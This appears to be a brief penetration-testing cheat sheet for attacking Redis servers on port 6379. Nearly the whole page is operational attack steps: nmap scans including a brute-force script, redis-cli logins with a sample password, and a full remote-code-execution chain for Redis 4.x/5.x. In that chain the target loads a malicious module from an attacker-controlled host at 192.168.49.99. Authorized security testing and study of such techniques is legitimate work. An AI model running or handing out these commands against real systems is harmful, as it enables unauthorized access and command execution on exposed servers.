Skip to content

6379 - Pentesting redis

scan

nmap

nmap -p 6379 -A $IP
nmap -sV -p 6379 --script=redis-info.nse $IP
nmap -sV -p 6379 --script=redis-brute.nse $IP

connect

redis-cli -h $IP
redis-cli -h $IP --pass password1234

exploit 4.X / 5.X

  • https://github.com/Ridter/redis-rce
  • https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd /RedisModules-ExecuteCommand
make

cd /redis-rce
python3 redis-rce.py -r $IP -p 6379 -L 192.168.49.99 -P 6379 -f ../RedisModules-ExecuteCommand/module.so